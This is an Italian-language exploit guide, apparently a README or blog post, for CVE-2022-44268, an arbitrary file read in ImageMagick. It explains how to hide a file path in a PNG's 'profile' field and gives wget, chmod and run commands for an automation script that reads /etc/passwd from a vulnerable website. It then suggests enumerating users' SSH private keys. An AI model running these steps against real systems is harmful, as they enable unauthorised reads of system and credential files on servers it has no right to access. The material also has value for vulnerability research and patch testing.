
Automazione dello sfruttamento di CVE-2022-44268 ImageMagick Arbitrary File Read

Automazione dello sfruttamento di CVE-2022-44268 ImageMagick Arbitrary File Read
Scoperta originale: https://www.metabaseq.com/imagemagick-zero-days/
Repository PoC: https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
ImageMagick interpreterà la stringa di testo "profile"** come un nome di file** e caricherà il contenuto come profilo grezzo, quindi l'attaccante può scaricare l'immagine ridimensionata che arriverà con il contenuto di un file remoto.
🔴 Prendi un file PNG, aggiungi un percorso di file al campo EXIF "profile", invialo a un sito web che utilizza una versione interessata di ImageMagick, esso interpreta il percorso del file, ne carica il contenuto nel campo EXIF, scarichi l'immagine, estrai i dati HEX nel campo "Raw Profile Type" e convertili in ASCII per leggere il file remoto.
Versioni interessate: ImageMagick 7.1.0-49
sudo apt install pngcrush imagemagick exiftool exiv2 -y
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/auto-cve-2022-44268.sh
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/flag.png
chmod +x auto-cve-2022-44268.sh
./auto-cve-2022-44268.sh <image name> <file to read>
./auto-cve-2022-44268.sh flag.png /etc/passwd
Una volta ottenuti gli utenti da /etc/passwd, prova a enumerare le chiavi private SSH da /home/.ssh// :
Non dimenticare :
imagemagick, exploit, vuln, magick convert, magick resize, exploitation, vulnerabilities, file read, CVE-2022-44268